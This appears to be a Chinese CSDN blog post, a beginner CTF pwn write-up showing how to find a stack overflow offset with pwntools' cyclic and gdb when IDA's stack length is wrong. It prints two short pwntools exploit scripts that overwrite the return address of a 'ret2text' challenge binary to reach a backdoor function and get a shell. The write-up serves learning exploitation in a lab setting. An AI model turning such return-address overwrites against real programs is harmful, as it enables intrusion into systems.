手动测量变量溢出长度

最新推荐文章于 2024-07-15 23:46:30 发布
最新推荐文章于 2024-07-15 23:46:30 发布
阅读量97 收藏 1
点赞数 2
分类专栏: pwn 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yw__y/article/details/130188246
版权

有时ida给出的栈长度是错的。就需要我们自己手动去测量栈长度,主要用到cyclic
使用工具cyclic生成无序字符串

cyclic 数字/数字是要生成的字符串字符数

在这里插入图片描述
这里用的是大佬Cyberangel的例子
大佬的例子
checksec检查文件
在这里插入图片描述
是32位的,开启了nx保护
拖入ida
在这里插入图片描述
找到后门函数
在这里插入图片描述在这里插入图片描述
地址是0x804863A
根据s的长度
在这里插入图片描述
在这里插入图片描述
得出偏移量是0x64+4(因为这是32位文件,所以加4)
编写exp如下

from pwn import*
p=process('./ret2text')
target=0x804863A
p.sendline('a'*(0x64+4)+p32(target))
p.interactive()

运行后发现
在这里插入图片描述
说明栈长度ida算错了,接下来就需要我们自己来计算偏移量了
用gdb调试程序
输入start,设置断点在main函数,输入c继续运行,将生成的无序字符粘贴在输入框中,回车
可以看到
在这里插入图片描述
观察可知溢出点为0x62616164
报错的意思是跳转到0x62616164这步出错了,意思是没有这个位置,这个位置就是200个有序字符其中最先溢出的部分。只要知道这个地址时输入的第几个字符,就可以知道前面有多少个字符了
cyclic有一个函数可以帮我们cyclic -l
根据溢出的地址可以得知溢出的四个字符为:baad(根据ASCⅡ码表)

cyclic -l daab//那四个字符

细心的人可能就会发现我输入的不是baad而是daab,这是因为机器的小端序存储,而这里溢出显示的也是小端序的,所以应该颠倒以下顺序,但是如果直接输入地址,就没这么麻烦了。

cyclic -l 0x62616164

结果和上面的是一样的,在这里插入图片描述
好啦,这样偏移量就测量出来了
修改一下exp

from pwn import*
p=process('./ret2text')
target=0x804863A
p.sendline('a'*(112)+p32(target))
p.interactive()

运行在这里插入图片描述
成功获取shell

yw__y
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
springboot运行时内存溢出_栈溢出的检测
weixin_39533896的博客
10-27 1934
说到stack(栈),大家很可能就会想起stack overflow(栈溢出),著名的程序问答网站http://stackoverflow.com 就是以此命名的。因为栈通常是从高地址向低地址增长的,因此"栈溢出"分为两种:超出低地址范围的overrun(上溢)和超出高地址范围的underrun(下溢),"上溢"主要是由过深的函数调用引起(比如递归调用):而"下溢"则会出现在数组/字符串越界的时候...
查看变量长度范围
05-05
查看c++中常用变量长度范围, 方便好用
快速计算栈溢出长度
kelxLZ的博客
11-27 1162
Author:ZERO-A-ONE Date:2021-11-27 之前看到网上很多在编写栈溢出的时候计算栈溢出长度的文章,很多工具或者方法放到现在以及没有办法使用了,我经常使用的工具是pwndbg里面调用pwntools的cyclic工具 我们以CTF Wiki里面的示例程序stack-example为例子 首先用IDA找到溢出函数gets的下一个地址为0x804849f,打断点 b *0x804849f 然后使用cyclic工具生成测试字符串 pwndbg> cyclic 200 aaaab.
cyclic查看缓冲区溢出长度
小龙在线
09-29 2281
read、gets等C函数对输入没有限制,如果有可以溢出的堆栈,就有缓冲区溢出漏洞。 方法一: 方法二: 使用pwntools的cyclic: 安装 $ apt-get update $ apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential $ pip install --upgrade pip $ pip install --upgrade pwntools 测试 cyclic
数据结构——堆栈的C++实现
zxr916的博客
11-02 583
数据结构——堆栈的C++实现 \qquad堆栈的创建、判断是否为空,入栈,出栈操作的C++实现。 #include<iostream> using namespace std; //1.定义 typedef struct Node* Link; struct Node { int num; Link next; }; //2.创建堆栈头结点 Link CreateStack() { Link s; s = new Node; s->next = NULL; return s
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 3017
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
变量系统的软测量建模研究
01-15
研究加氢裂化分馏塔多个产品的质量指标同时预报的一类M I MO 软测量建模问题, 采用RBF ...应用实例表明, 所研究的软测量建模为多变量系统软测量的工业应用提供了一种有 效实用的方法。</p>
C++不使用变量求字符串长度strlen函数的实现方法
09-03
这两个实现都依赖于递归,但需要注意的是,由于C++的递归深度有限,对于非常长的字符串,可能会导致栈溢出的问题。在实际编程中,通常建议使用迭代的方式来避免这个问题,因为迭代通常比递归更高效且不会受栈空间...
手动jdk环境变量设置
06-27
java环境变量设置,将文件中的安装路径替换掉就行了。
LSTM多变量预测
09-24
**LSTM多变量预测**是深度学习领域中用于序列数据预测的一种常见方法,特别是在时间序列分析、自然语言处理和预测任务中。LSTM(长短期记忆网络)是一种递归神经网络(RNN)的变体,它克服了标准RNN在处理长期依赖...
简单的整数溢出
Pwnpanda的博客
12-14 2862
首先说一下原理 为什么会出现整数溢出? 因为机器底层只能处理01串,也就是说底层本身是无法识别有符号数和无符号数的,这些规定是存在于编辑器层面,在C语言中,整数的基本类型有以下几种(图片来源:CTF Wiki) 溢出又分上溢出和下溢出溢出: 当出现0x7fff+1,或者0xffff+1的时候,假设0x7fff是无符号数,那么+1之后就是0 下溢出: 例如0x0000-1 -&gt; 0xff...
pwn,获取系统权限,入门题,cyclic
SanOrintea的博客
09-01 6428
输入【./ret2text】运行程序,发现让你输入,那么我们先随便输入个【123456】,程序结束了。 用ida打开这个程序,发现有‘system’函数,还可以输入,那么就可以利用栈溢出获取系统权限。 首先先多输入点,看看什么时候溢出,这里用cyclic有序字符串。 输入【cyclic 200】生成200个有序字符。 用gdb打开ret2text,输入【gdb ret2te...
一道简单的入门pwn题
m1785717的博客
09-07 9684
这是一道入门的pwn题 链接:https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码:f0qy 拿到题先用file命令查看一下文件信息 可以看到是32-bit 的elf文件,用32位的IDA打开。 首先进入main函数,F5反编译后分析代码 定位到输入的参数&amp;s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system...
Lumos学习王佩丰Excel第四讲:排序与选择
Sunshine_XX的博客
07-10 408
自定义排序演示:工资条拆分的演示:如果遇到很长的表,标题只存在于顶端,打印出来观感不好,可以这样做:有些版本的excel复制筛选数据容易把背后隐藏的所有数据都复制上去,这时可选中定位条件的“可见单元格”选项,复制粘贴即可。并排表示且,错排表示或。ctrl+shift+↓+→全选,演示说明:回头学原理,先记住一句话,要想筛选对,条件表头不要对。
ROS基础学习-ROS运行管理
周陽讀書
07-11 766
ROS运行管理。
探索Perl语言:入门学习与实战指南
最新发布
洛秋的博客
07-15 633
Perl(Practical Extraction and Report Language)由Larry Wall于1987年创建,旨在帮助系统管理员简化日常任务。高效灵活:Perl的语法灵活多样,支持多种编程风格(过程式、面向对象等)。强大的文本处理能力:内置强大的正则表达式支持,是处理文本数据的利器。丰富的模块库:通过CPAN(Comprehensive Perl Archive Network)可以方便地获取和使用各类模块。Perl广泛应用于系统管理、Web开发、网络编程、数据库操作等领域。
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 154
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
python 语法学习 day 7
2303_79973545的博客
07-15 226
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
java测量八种包装类的变量长度
10-24
它们的变量长度是不同的,具体如下: 1. Byte:1字节 2. Short:2字节 3. Integer:4字节 4. Long:8字节 5. Float:4字节 6. Double:8字节 7. Character:2字节 8. Boolean:1字节 需要注意的是,这里的变量长度...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值